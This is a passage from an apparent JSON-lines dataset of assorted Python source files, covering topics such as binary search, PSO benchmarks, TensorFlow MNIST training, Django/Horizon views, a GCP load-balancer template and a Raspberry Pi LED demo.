attempted = solved + missed\n\n return str(solved) + \"/\" + str(attempted) + \" in \" + str(minutes) + \":\" + str(seconds)\n\ndef _format_result_OVER_10MIN(result):\n minutes, seconds = int(result / 6000), result % 6000\n return shrink_or_enlarge_string(str(minutes)) + \":\" + shrink_or_enlarge_string(str(seconds)) + \".\" + str(result % 100)\n\ndef _format_result_UNDER_1MIN(result):\n seconds, millis = int(result / 100), result % 100\n return str(seconds) + \".\" + shrink_or_enlarge_string(str(millis))\n\ndef shrink_or_enlarge_string(input_string, 
string_length = 2):\n    while len(input_string) > string_length:\n        input_string = input_string[1:]\n    while len(input_string) < string_length:\n        input_string = '0' + input_string\n    return input_string","sub_path":"src/lib/utils/WCA_result_to_string.py","file_name":"WCA_result_to_string.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"405482335","text":"import sys\nimport serial\n\ndef main():\n\tport = serial.Serial(\"/dev/ttyS0\", 57600, timeout=0, dsrdtr=False, rtscts=False, xonxoff=False)\n\twhile True:\n\t\tb = port.read()\n\t\tprint(b)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"SerialTest.py","file_name":"SerialTest.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"106796157","text":"import os\nimport threading\nimport numpy as np\n\n#import math as m\n\ndef Combine_volumes(list_of_files,outfilename):\n    \n    # assumes that the spacing is the same for all volumes and that they align on a common grid.\n    \n    layers=[]\n    dims=[]\n    origin=[]\n    spacing=[]\n    \n    cnt=0\n\n    for file in list_of_files:\n        if not os.path.exists(file):\n            raise ValueError(\"Path %s does not exist.\" % file)\n        \n        tmp=importlayer(filename=file, importer='[Teem Importer]', mode='data')\n        layers.append(tmp[0])\n\n        # this is a bit of a trick to get the group number. It only works with a fresh session with no other layers loaded.\n        # Additionally, each of the files must be in a separate group (an assumption needed to combine them)\n        layergroup=get(stateid=tmp[0]+'::generation')\n        \n        dims.append(get(stateid=('group_'+str(layergroup)+'::dimensions')))\n        origin.append(get(stateid=('group_'+str(layergroup)+'::origin')))\n        spacing.append(get(stateid=('group_'+str(layergroup)+'::spacing')))\n\n    dims=np.array(dims)\n    origin=np.array(origin)\n    spacing=np.array(spacing)\n    \n    mx_all=dims*spacing+origin\n    mx_size=np.array([max(mx_all[:,0]),max(mx_all[:,1]),max(mx_all[:,2])])\n    orig_new=np.array([min(origin[:,0]),min(origin[:,1]),min(origin[:,2])])\n    spac= np.mean(spacing,axis=0)\n    dims_new=np.around((mx_size-orig_new)/spac)\n    \n    r_mn = np.around((orig_new-origin)/spac)\n    r_mx = r_mn+dims_new\n    \n    padded=[]\n    for k in range(0,len(layers)):\n        tmp_pad=resample(layerids=layers[k],x=dims_new[0],y=dims_new[1],z=dims_new[2],crop='true',range_min=r_mn[k,:],range_max=r_mx[k,:],padding='0',kernal='box')\n        padded.append(tmp_pad[0])\n\n    if len(layers)>26:\n        raise ValueError(\"Too many layers (%d) to use in this operation.\" % len(padded))\n    \n    alpha=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n\n# a naive combination method.
Assumes no overlap\n express = 'RESULT=A'\n for k in range(1,len(padded)):\n express=express+'+'+alpha[k]\n\n express=express+';'\n wait_for_layer(padded[len(padded)-1])\n\n combined=arithmeticfilter(layerids=padded,expressions=express,output_type='data',preserve_data_format='true')\n\n wait_for_layer(combined)\n\n result=exportlayer(layer=combined,file_path=outfilename,exporter='[NRRD Exporter]',extension='.nrrd')\n\n print('file saved to '+outfilename)\n\n\n\ndef wait_for_layer(layer):\n #checks to make sure that the layer is available before trying operations on it.\n\n MAX_ITERATIONS=1000\n TIMEOUT=2\n c = threading.Condition()\n c.acquire()\n \n layerStatus = get(stateid=layer+\"::data\")\n counter = 1\n with c:\n while not layerStatus == \"available\":\n if counter > MAX_ITERATIONS:\n break\n counter += 1\n c.wait(TIMEOUT)\n layerStatus = get(stateid=layer+\"::data\")\n print('wainting for '+layer)\n\n","sub_path":"Python_Code/Seg3D/Combine_volumes.py","file_name":"Combine_volumes.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"341147545","text":"import tensorflow as tf\nmnist = tf.keras.datasets.mnist\n\n###Callback Function###\nclass myCallback(tf.keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs={}):\n if(logs.get('loss')<0.01):\n print(\"\\nReached 99% accuracy so cancelling training!\")\n self.model.stop_training = True\n\n###Setup a Callback###\ncallbacks = myCallback()\n\n###Split up the data###\n(training_images, training_labels), (test_images, test_labels) = mnist.load_data()\n\n###Normalize the data###\ntraining_images = training_images / 255.0\ntest_images = test_images / 255.0\n\n##Design the Neural Network###\nconorsnn = tf.keras.models.Sequential([tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128, activation=tf.nn.relu), \n tf.keras.layers.Dense(10, activation=tf.nn.softmax)])\n\n###Compile the Neural Network###\nconorsnn.compile(optimizer = tf.train.AdamOptimizer(),\n loss = 'sparse_categorical_crossentropy',\n metrics=['accuracy'])\n \n###Train the Neural Network###\nconorsnn.fit(training_images, training_labels, epochs=15, callbacks=[callbacks])\n\n###Test the Neural Network###\nconorsnn.evaluate(test_images, test_labels)\n","sub_path":"Exercise2.py","file_name":"Exercise2.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"214698832","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tools import read_pfm\n\nBASE_DIR = 'E:\\\\Projects\\\\Datasets\\\\MIDDLEBURY\\\\2005'\n\nscene_lst = os.listdir(BASE_DIR)\nfocal_length = 3740\nbaseline = 0.16\n\nfor scene in scene_lst:\n files = os.listdir('%s/%s' % (BASE_DIR, scene))\n\n disp_lst = [i for i in files if 'disp' in i]\n dmin = [i for i in files if 'txt' in i][0]\n min_ = float(open('%s/%s/dmin.txt'% (BASE_DIR, scene)).readline().strip())\n print()\n # color_lst = [i for i in files if 'disp' not in i]\n for index in range(len(disp_lst)):\n pdisp = '%s/%s/%s' % (BASE_DIR, scene, disp_lst[index])\n # pcolor = '%s/%s/%s' % (BASE_DIR, scene, color_lst[index])\n print(pdisp)\n disp = cv2.imread(pdisp)[:, :, 0]\n mask = disp != 0\n\n disp = disp + 1e-10\n disp = focal_length*baseline/disp\n disp = disp*mask\n # print(np.max(disp), np.min(disp), np.mean(disp))\n disp = disp * 1000\n disp = disp.astype(np.uint16)\n # 
cv2.imwrite('C:\\\\Users\\\\39796\\Desktop\\\\xxxxxx.png',disp)\n # disp = disp.astype(np.uint16)\n # plt.imshow(disp)\n # plt.show()\n","sub_path":"pytorch_version/DepthSuper-resolution/MyUtils/mani_midburry_2006.py","file_name":"mani_midburry_2006.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"398350775","text":"from tabipy import Table, TableRow, TableCell, TableHeaderRow, TableHeader\n\ndef test_simple():\n # For now, this is little more than a smoke test to check that it's not\n # erroring out.\n t = Table(TableHeaderRow('a','b','c'),\n (1, 2, 3),\n (2, 4, 6),\n )\n \n html = t._repr_html_()\n assert '= lo:\n mid = int(lo + (hi - lo) / 2)\n curr = arr[mid]\n if val < curr:\n hi = mid-1\n elif val > curr:\n lo = mid+1\n else:\n index = mid\n if index == len(arr)-1 or index == 0:\n break\n else:\n if arr[index-1] == val:\n hi = mid-1\n continue\n else:\n break\n if index >= 0:\n print('Found ' + str(val) + ' at ' + str(index) + '.')\n else:\n print('Value is not in array.')\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print('Usage: ' + sys.argv[0]+ ' [val] [array of integers]')\n exit(1)\n b = BinarySearch(sys.argv[2:], sys.argv[1])\n b.binary_search()\n","sub_path":"algorithms/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"560189689","text":"import sys \nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import * \nfrom PyQt4.QtWebKit import * \nimport time\n\nclass Printer(object):\n def __init__(self, url, name):\n # self.url = url\n # self.nam = name\n self.app = QApplication(sys.argv)\n self.web = QWebView()\n self.web.load(QUrl(url))\n self.printer = QPrinter()\n self.printer.setPageSize(QPrinter.A4)\n self.printer.setOutputFormat(QPrinter.PdfFormat)\n self.printer.setOutputFileName(name)\n def convertIt(self):\n self.web.print_(self.printer)\n print (\"convert OK\")\n QApplication.exit()\n def printpdf(self):\n QObject.connect(self.web, SIGNAL(\"loadFinished(bool)\"), self.convertIt)\n # sys.exit(self.app.exec_())\n\n\n# app = QApplication(sys.argv)\n# web = QWebView()\n# web.load(QUrl(\"https://www.quora.com/What-are-some-social-norms-one-can-intentionally-break-to-get-a-response\"))\n# # web.load(QUrl('https://www.baidu.com'))\n# printer = QPrinter()\n# printer.setPageSize(QPrinter.A4)\n# printer.setOutputFormat(QPrinter.PdfFormat)\n# printer.setOutputFileName(\"fileOK.pdf\")\n# index = 0\n# index2 = 0\n# def convertIt():\n# global index\n# index = index + 1\n# print('index1:',index)\n# web.print_(printer)\n# print (\"Pdf generated\")\n# QApplication.exit()\n# # QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n# # def pdfprinter(url, name):\n# # global web\n# # global printer\n# # global index2\n# # index2 = index2 + 1\n# # print('index2:',index2)\n# # web.load(QUrl(url))\n# # printer.setOutputFileName(name)\n# # QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n# print(\"1111111111111\")\n\n# print(12)\n# web.load(QUrl('https://www.baidu.com/'))\n# print(34)\n# printer.setOutputFileName('fileOK3.pdf')\n# # web.print_(printer)\n# b = QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n\n# print(12)\n# web.load(QUrl('https://www.baidu.com/'))\n# print(34)\n# printer.setOutputFileName('fileOK4.pdf')\n# b = QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n# # 
web.load(QUrl('http://blog.csdn.net/dengjianqiang2011/article/details/9260435'))\n# # printer.setOutputFileName('fileOK4.pdf')\n# # b = QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n# # web.load(QUrl('http://blog.csdn.net/raylee2007/article/details/48437661'))\n# # printer.setOutputFileName('fileOK5.pdf')\n# # b = QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n\n\n\n\n\n\n\n# # time.sleep(10)\n# # print(\"2222222222222\")\n# # pdfprinter('http://blog.csdn.net/whiterbear/article/details/50232637','fileOK4.pdf')\n# # time.sleep(10)\n# # print(\"3333333333333\")\n# # pdfprinter('http://blog.csdn.net/raylee2007/article/details/48437661','fileOK5.pdf')\n\n\n\n\n\n# sys.exit(app.exec_())","sub_path":"SpiderDemo/qtprintLib.py","file_name":"qtprintLib.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"520340847","text":"# Copyright 2015 Google Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Creates a load balancer using HAProxy.\"\"\"\n\n\ndef GenerateConfig(context):\n \"\"\"Generate configuration.\"\"\"\n\n lb_name = ''.join([context.env['deployment'],\n '-',\n context.env['name'],\n '-internal-lb'])\n\n metadata = {\n 'algorithm': context.properties['algorithm'],\n 'app-port': context.properties['app-port'],\n 'port': context.properties['port'],\n 'groups': ' '.join(context.properties['groups'])\n }\n\n resources = [{\n 'name': lb_name,\n 'type': 'instance.py',\n 'properties': {\n 'machine-type': context.properties['machine-type'],\n 'metadata': metadata,\n 'metadata-from-file': {\n 'startup-script': 'haproxy-startup-script.sh'\n },\n 'zone': context.properties['zone']\n }\n }]\n\n return {\n 'resources': resources,\n 'outputs': [{\n 'name': 'address',\n 'value': '$(ref.' 
+ lb_name + '.address)'\n }]\n }\n\n","sub_path":"examples/v2/internal_lb_haproxy/internal-lb.py","file_name":"internal-lb.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"262803517","text":"from django.utils.translation import ugettext_lazy as _\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.core.urlresolvers import reverse\n\nfrom horizon import exceptions\nfrom horizon import tables\nfrom horizon.utils import memoized\n\nfrom nuage_horizon.api import neutron\n\nfrom nuage_horizon.dashboards.project.gateways \\\n import tables as gateway_tables\nfrom nuage_horizon.dashboards.project.gateways.ports \\\n import tables as port_tables\n\n\nclass IndexView(tables.DataTableView):\n table_class = gateway_tables.GatewaysTable\n template_name = 'nuage/gateways/index.html'\n\n def get_data(self):\n try:\n gws = neutron.nuage_gateway_list(self.request)\n except Exception:\n gws = []\n msg = _('Nuage Gateway list can not be retrieved.')\n exceptions.handle(self.request, msg)\n return gws\n\n\nclass DetailView(tables.DataTableView):\n table_class = port_tables.PortsTable\n template_name = 'nuage/gateways/detail.html'\n page_title = _(\"Gateway Details: {{ gateway.name }}\")\n failure_url = reverse_lazy('horizon:project:gateways:index')\n\n def get_data(self):\n try:\n gw = self._get_gateway_data()\n if gw:\n ports = neutron.nuage_gateway_port_list(self.request, gw.id)\n else:\n ports = []\n except Exception:\n ports = []\n msg = _('Nuage Gateway Port list can not be retrieved.')\n exceptions.handle(self.request, msg)\n return ports\n\n @memoized.memoized_method\n def _get_gateway_data(self):\n try:\n gw_id = self.kwargs['gateway_id']\n gateway = neutron.nuage_gateway_get(self.request, gw_id)\n except Exception:\n gateway = None\n msg = _('Gateway can not be retrieved.')\n exceptions.handle(self.request, msg, redirect=self.failure_url)\n return gateway\n\n def get_context_data(self, **kwargs):\n context = super(DetailView, self).get_context_data(**kwargs)\n gateway = self._get_gateway_data()\n context[\"gateway\"] = gateway\n table = gateway_tables.GatewaysTable(self.request)\n context[\"url\"] = self.get_redirect_url()\n context[\"actions\"] = table.render_row_actions(gateway)\n return context\n\n @staticmethod\n def get_redirect_url():\n return reverse_lazy('horizon:project:gateways:index')\n","sub_path":"nuage_horizon/dashboards/project/gateways/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"529800227","text":"import logging\nimport os\nimport numpy as np\nimport pickle\nimport random\nimport sys\nimport tempfile as tmp\n\nfrom genens.render.plot import export_plot\nfrom genens.workflow.evaluate import SampleCrossValEvaluator, CrossValEvaluator\n\nif sys.platform == 'darwin':\n os.environ['OBJC_DISABLE_INITIALIZE_FORK_SAFETY'] = 'YES'\nos.environ['JOBLIB_TEMP_FOLDER'] = tmp.gettempdir()\nos.environ['OMP_NUM_THREADS'] = '1'\nos.environ['OPENBLAS_NUM_THREADS'] = '1'\nos.environ['MKL_NUM_THREADS'] = '1'\nfrom genens import GenensClassifier, GenensRegressor\n\nfrom sklearn.metrics import get_scorer\n\nfrom frameworks.shared.callee import call_run, result, output_subdir, utils\n\nfrom typing import Union\n\n\nlog = logging.getLogger(__name__)\n\n\ndef run(dataset, config):\n log.info(\"\\n**** genens ****\\n\")\n\n is_classification = config.type == 
'classification'\n\n if not is_classification:\n Warning(\"Regression not supported.\")\n return None\n\n # Mapping of benchmark metrics to TPOT metrics\n metrics_mapping = {\n 'acc': get_scorer('accuracy'),\n 'auc': get_scorer('roc_auc'),\n 'f1': get_scorer('f1'),\n 'logloss': get_scorer('neg_log_loss'),\n 'mae': get_scorer('neg_mean_absolute_error'),\n 'mse': get_scorer('neg_mean_squared_error'),\n 'msle': get_scorer('neg_mean_squared_log_error'),\n 'r2': get_scorer('r2')\n }\n scoring_metric = metrics_mapping[config.metric] if config.metric in metrics_mapping else None\n if scoring_metric is None:\n raise ValueError(\"Performance metric {} not supported.\".format(config.metric))\n\n X_train, X_test = dataset.train.X_enc, dataset.test.X_enc\n y_train, y_test = dataset.train.y_enc, dataset.test.y_enc\n\n training_params = {k: v for k, v in config.framework_params.items() if not k.startswith('_')}\n n_jobs = config.framework_params.get('_n_jobs', config.cores) # useful to disable multicore, regardless of the dataset config\n\n sample_size = config.framework_params.get('_sample_size', None)\n if sample_size is not None:\n evaluator = SampleCrossValEvaluator(sample_size=sample_size, per_gen=True, cv_k=5)\n else:\n evaluator = CrossValEvaluator(cv_k=5)\n\n print(f\"Chosen sample size: {sample_size}.\")\n print(f'cv_k: {evaluator.cv_k}')\n\n training_params['evaluator'] = evaluator\n\n runtime_s = config.max_runtime_seconds\n if runtime_s >= 600:\n runtime_s -= 5 * 60 # avoid premature process termination\n elif runtime_s > 10:\n runtime_s -= 5\n\n if not config.framework_params.get('disable_logging', True):\n log_path = os.path.join(output_subdir('logs', config), 'evo_log_file.txt')\n else:\n log_path = None\n\n print(f\"Setting time limit to {runtime_s} seconds.\")\n\n log.info('Running genens with a maximum time of %ss on %s cores, optimizing %s.',\n runtime_s, n_jobs, scoring_metric)\n\n if config.seed is not None:\n # random state is yet to be unified in genens\n np.random.seed(config.seed)\n random.seed(config.seed)\n\n print(f'Training params: {training_params}')\n\n estimator = GenensClassifier if is_classification else GenensRegressor\n genens_est = estimator(n_jobs=n_jobs,\n max_evo_seconds=runtime_s,\n scorer=scoring_metric,\n log_path=log_path,\n **training_params)\n\n with utils.Timer() as training:\n genens_est.fit(X_train, y_train)\n\n log.info('Predicting on the test set.')\n\n best_pipe = genens_est.get_best_pipelines()[0]\n best_pipe.fit(X_train, y_train)\n\n predictions = best_pipe.predict(X_test)\n\n try:\n probabilities = best_pipe.predict_proba(X_test) if is_classification else None\n except AttributeError:\n target_values_enc = dataset.target.label_encoder.transform(dataset.target.values)\n probabilities = utils.Encoder('one-hot', target=False, encoded_type=float).fit(target_values_enc).transform(predictions)\n\n save_artifacts(genens_est, config)\n\n return result(output_file=config.output_predictions_file,\n predictions=predictions,\n truth=y_test,\n probabilities=probabilities,\n target_is_encoded=is_classification,\n models_count=len(genens_est.get_best_pipelines()),\n training_duration=training.duration)\n\n\ndef save_artifacts(estimator: Union[GenensClassifier, GenensRegressor], config):\n try:\n artifacts = config.framework_params.get('_save_artifacts', False)\n\n if 'pickle_models' in artifacts:\n models_dir = os.path.join(output_subdir('pickle_models', config))\n\n # pickle top 3 best pipelines\n for i, pipe in enumerate(estimator.get_best_pipelines()):\n with 
open(models_dir + '/pipeline{}.pickle'.format(i), 'wb') as pickle_file:\n pickle.dump(pipe, pickle_file, pickle.HIGHEST_PROTOCOL)\n\n if 'models' in artifacts:\n models_dir = os.path.join(output_subdir('models', config))\n\n # top 3 individual fitness values\n with open(models_dir + '/ind-fitness.txt', 'w+') as out_file:\n best_inds = estimator.get_best_pipelines(as_individuals=True)\n\n for i, ind in enumerate(best_inds):\n out_file.write('Individual {}: Score {}\\n'.format(i, ind.fitness.values))\n # individual tree\n\n if 'models_png' in artifacts:\n from genens.render.graph import create_graph\n\n models_dir = os.path.join(output_subdir('models', config))\n for i, ind in enumerate(best_inds):\n create_graph(ind, models_dir + '/graph{}.png'.format(i))\n\n if 'log' in artifacts:\n log_dir = os.path.join(output_subdir('logs', config))\n\n # write logbook string representation to output dir\n with open(log_dir + '/logbook.txt', 'w+') as log_file:\n log_file.write(estimator.logbook.__str__() + '\\n')\n\n # evolution plot\n export_plot(estimator, log_dir + '/result.png')\n\n except:\n log.debug(\"Error when saving artifacts.\", exc_info=True)\n\nif __name__ == '__main__':\n call_run(run)","sub_path":"frameworks/genens/exec.py","file_name":"exec.py","file_ext":"py","file_size_in_byte":6263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"36393533","text":"from typing import Iterator\n\nfrom common.datetime import get_current_year\nfrom common.decimal import Decimal\nfrom entities.taxes_policy.models import TaxesPolicy, TaxesPolicyRange\n\n\nclass Tax: # Full tax from annual salary including all tax policy range lines for selected year.\n annual_salary_amount: Decimal\n year: int\n _range_lines: 'TaxRangeLinesList[TaxRangeLine]' = None\n\n def __init__(self, annual_salary_amount: Decimal, year: int = None):\n self.annual_salary_amount = Decimal(annual_salary_amount)\n self.year = year or get_current_year()\n\n @property\n def range_lines(self):\n if self._range_lines is None: # lazy\n taxes_policy = TaxesPolicy.objects.get_for_year(self.year)\n self._range_lines = TaxRangeLinesList(\n TaxRangeLine(tax_policy_range=policy_range, annual_salary_amount=self.annual_salary_amount)\n for policy_range in taxes_policy.ranges.all()\n )\n return self._range_lines\n\n\nclass TaxRangeLine: # Tax from annual salary for a special taxes policy range line.\n policy_range: TaxesPolicyRange\n amount: Decimal\n\n def __init__(self, tax_policy_range: TaxesPolicyRange, annual_salary_amount: Decimal):\n self.policy_range = tax_policy_range\n self._recalculate_amount(annual_salary_amount)\n\n def _recalculate_amount(self, annual_salary_amount: Decimal):\n calculated_amount = Decimal(0)\n if annual_salary_amount > self.policy_range.amount_from:\n\n if annual_salary_amount <= self.policy_range.amount_to:\n amount_before_range_ends = annual_salary_amount\n else:\n amount_before_range_ends = self.policy_range.amount_to\n\n amount_in_range = amount_before_range_ends - self.policy_range.amount_from\n calculated_amount = amount_in_range / 100 * self.policy_range.percent\n\n self.amount = calculated_amount\n\n\nclass TaxRangeLinesList(list):\n def __iter__(self) -> Iterator['TaxRangeLine']: return super(TaxRangeLinesList, self).__iter__() # for type hints\n\n @property\n def total_amount(self):\n result = Decimal(0)\n for range_line in self:\n result += Decimal(range_line.amount)\n return 
result\n","sub_path":"src/entities/tax/models/tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"328526879","text":"import numpy as np\nimport math\nimport sys\nsys.path.append('../')\nfrom pso.local_best_pso import local_best_pso\nfrom common.functions.single_objective import *\n\n# Run Local Best PSO 20 times on each function and take an average\n\ndef run_20(n, dims, c1, c2, w, k, iters, obj_func):\n '''\n n: Number of particles in swarm\n dims: Number of dimensions\n c1: Cognitive weight (how much each particle references their memory)\n c2: Social weight (how much each particle references swarm/group memory)\n w: Velocity weight\n k: number of nearest neighbors to evaluate\n iters: Number of iterations\n '''\n vals = []\n for i in range(20):\n vals.append(local_best_pso(n, dims, c1, c2, w, k, iters, obj_func))\n print(\"Mean value:\",np.mean(vals))\n\nalgo = local_best_pso\n\ndef run_20(n, dims, c1, c2, w, k, iters, obj_func, val_min, val_max):\n '''\n n: Number of particles in swarm\n dims: Number of dimensions\n c1: Cognitive weight (how much each particle references their memory)\n c2: Social weight (how much each particle references swarm/group memory)\n w: Velocity weight\n iters: Number of iterations\n '''\n vals = []\n for i in range(20):\n vals.append(algo(n, dims, c1, c2, w, k, iters, obj_func,\\\n val_min, val_max))\n print(\"Mean value:\",np.mean(vals))\n\ndef run_all_tests(obj_func, val_min, val_max):\n n = 30\n dims = 2\n c1 = 0.5\n c2 = 0.3\n w = 0.9\n k = 4\n iters = 2000\n\n print(\"--------------------------\")\n print(\"Testing %s\" %obj_func)\n print(\"Single run test:\", algo(n, 2, c1, c2, w, k, iters, obj_func,\\\n val_min, val_max))\n print(\"Run 20:\", run_20(n, 2, c1, c2, w, k, iters, obj_func, \\\n val_min, val_max))\n\nrun_all_tests(sphere_func, -5.12, 5.12)\nrun_all_tests(rosenbrock_func, -2.048, 2.048)\nrun_all_tests(ackley_func, -32.768, 32.768)\nrun_all_tests(griewank_func, -600, 600)\nrun_all_tests(rastrigin_func, -5.12, 5.12)\nrun_all_tests(weierstrass_func, -0.5, 0.5)\n","sub_path":"pso/run_local_best.py","file_name":"run_local_best.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"34427004","text":"# -*-coding: utf-8 -*-\nfrom test.test__locale import candidate_locales\n\n# 返回结果,不包含重复的组合,每个数可以重复使用。 dfs\ndef combineSum(candidates,target):\n candidates.sort()\n res = []\n dfs(candidates,target,0,[],res)\n return res\n\n\ndef dfs(candidates,target,index,path,res):\n if target<0:\n return \n if target == 0:\n res.append(path)\n return\n for i in range(index,len(candidates)):\n dfs(candidates,target-candidates[i], i,path+[candidates[i]],res)\n \n\nprint (combineSum([2,3,6,7], 7))\n\n# 返回所有组合的个数,不同顺序的组合属于不同的解\n\n#动态规划:\n\ndef combineNum1(nums,target):\n nums.sort()\n dp = [0]*(target+1)\n dp[0] = 1\n \n for i in range(1,target+1):\n for num in nums:\n if num > target:\n break\n dp[i] += dp[i-num]\n \n \n return dp[target]\n# 组合只能用k个数,每个数只能用一次\ndef combinationSum3(self, k, n):\n res = []\n self.dfs(xrange(1,10), k, n, 0, [], res)\n return res\n \ndef dfs(self, nums, k, n, index, path, res):\n if k < 0 or n < 0: # backtracking \n return \n if k == 0 and n == 0: \n res.append(path)\n for i in xrange(index, len(nums)):\n self.dfs(nums, k-1, n-nums[i], i+1, path+[nums[i]], 
res)","sub_path":"workspace/新建文件夹/Leetcode/review/CombinationSum.py","file_name":"CombinationSum.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"64313183","text":"import tensorflow as tf\nimport numpy as np\nimport scipy.signal\n\ndef n_step_r(v, all_r, gamma):\n \"\"\"Estimate q values for a trajectory\"\"\"\n n_steps = []\n for r in all_r[::-1]:\n v = r + gamma * v\n n_steps.append(v)\n n_steps.reverse()\n return n_steps\n\ndef discounted_rs(rs, gamma):\n # copied over\n return scipy.signal.lfilter([1], [1, -gamma], rs[::-1], axis=0)[::-1]\n\ndef gae(rs, vs, gamma, lam):\n T = len(rewards)\n lastgaelam = 0\n gaelam = np.empty(T, 'float32')\n tdlamret = np.empty(T, 'float32')\n for t in reversed(range(T)):\n nonterminal = 1 - (t == T - 1)\n delta = rs[t] + gamma * vs[t+1] * nonterminal - vs[t]\n gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam\n tdlamret = gaelam + vs\n return gaelam, tdlamret\n\n\ndef traj(pi, env, T):\n obses, acts, rs, ds = [], [], [], []\n obs = env.reset()\n for t in range(T):\n act = pi(np.expand_dims(obs, axis=0))[0]\n obses.append(obs)\n acts.append(act)\n obs, r, d, _ = env.step(act)\n rs.apped(r)\n ds.append(d)\n if d: break\n return np.array(obses), np.array(acts), np.array(rs), np.array(ds)\n\ndef rollout(pi, env, horizon, T):\n paths = []\n t = 0\n while t < T:\n obses, acts, rs, ds = [], [], [], []\n obs = env.reset()\n for i in range(horizon):\n t += 1\n act = pi(np.expand_dims(obs, axis=0))[0]\n obses.append(obs)\n acts.append(act)\n obs, r, d, _ = env.step(act)\n rs.append(r)\n ds.append(d)\n if d:\n obses = np.array(obses)\n acts = np.array(acts)\n rs = np.array(rs)\n ds = np.array(ds)\n path = {'obses': obses, 'acts': acts, 'rs': rs, 'ds': ds}\n paths.append(path)\n break\n return paths\n\ndef make_batch(rollout, key):\n batch = np.concatenate([path[key] for path in rollout])\n return batch\n","sub_path":"common/rl_util.py","file_name":"rl_util.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"604794947","text":"import os\nimport glob as gb\nprint('h')\npng_path = os.path.join('/home/zackzhh/my_space/yolo3/pytorch-yolo-v3/JPEGImages/*.png')\nimg_path = gb.glob(png_path) \nfor img in img_path:\n\tprint('start')\n\tfilepath,filename = os.path.split(img)\n\tfilename,_ = os.path.splitext(filename)\n\tnewpath = os.path.join(filepath,filename+'.jpg')\n\tprint(img,newpath)\n\tos.rename(img,newpath)\n","sub_path":"png2jpg.py","file_name":"png2jpg.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"364362876","text":"#LED demo for new computer science students.\n#Written by Jake Charman\n\n#Import required libraries\nimport RPi.GPIO as GPIO\nfrom time import sleep\nfrom random import randint\n\n#Set up the GPIO settings\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n#Define the pins used\npins = [14, 15, 18, 23, 24]\n\n#Set all the pins as outputs\nfor pin in pins:\n GPIO.setup(pin, GPIO.OUT)\n\n#Flash all LEDs \ndef allFlash():\n #Twice...\n for i in range(0, 2):\n #Turn on all the LEDs \n for pin in pins:\n GPIO.output(pin, True)\n #Wait for one second\n sleep(1)\n #Turn off all the LEDs\n for pin in pins:\n GPIO.output(pin, False)\n #Wait for one second\n sleep(1)\n\n#Flash LEDs in sequence\ndef chaseLights():\n #Five times...\n for i in 
